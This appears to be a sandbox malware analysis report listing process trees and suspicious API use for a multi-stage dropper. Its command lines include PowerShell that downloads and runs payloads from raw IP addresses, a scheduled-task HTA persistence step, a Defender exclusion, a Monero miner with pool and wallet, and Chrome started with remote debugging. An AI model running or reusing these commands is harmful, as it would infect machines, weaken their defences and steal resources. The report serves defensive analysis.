Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 468 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\cmd.exe
PID 468 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\cmd.exe
PID 468 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\cmd.exe
PID 468 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\mshta.exe
PID 468 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\mshta.exe
PID 468 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe C:\Windows\SysWOW64\mshta.exe
PID 4448 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1156 wrote to memory of 4824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1156 wrote to memory of 4824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1156 wrote to memory of 4824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 2352 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE
PID 4824 wrote to memory of 2352 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE
PID 4824 wrote to memory of 2352 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE
PID 2352 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2352 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2352 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 628 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
PID 628 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
PID 628 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
PID 628 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
PID 628 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
PID 1580 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2024 wrote to memory of 3272 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2024 wrote to memory of 3272 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 628 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
PID 628 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
PID 628 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
PID 628 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 628 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 628 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 2788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
PID 3272 wrote to memory of 4940 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3272 wrote to memory of 4940 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4940 wrote to memory of 4920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4940 wrote to memory of 4920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4920 wrote to memory of 3396 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4920 wrote to memory of 3396 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4940 wrote to memory of 3404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 628 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
PID 628 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
PID 628 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
PID 628 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
PID 628 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
PID 4044 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
PID 4044 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
PID 4044 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
PID 4044 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
PID 4044 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
PID 4044 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
PID 4044 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe

"C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn dC5qAma86c3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn dC5qAma86c3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE

"C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\162.tmp\163.tmp\164.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2788 -ip 2788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES35B1.tmp" "c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\CSC1D221A13830145B39B7013BD391E7E61.TMP"

C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4044 -ip 4044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 808

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\iSoxSIyN\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1436"

C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe0d36cc40,0x7ffe0d36cc4c,0x7ffe0d36cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1884 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2296 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

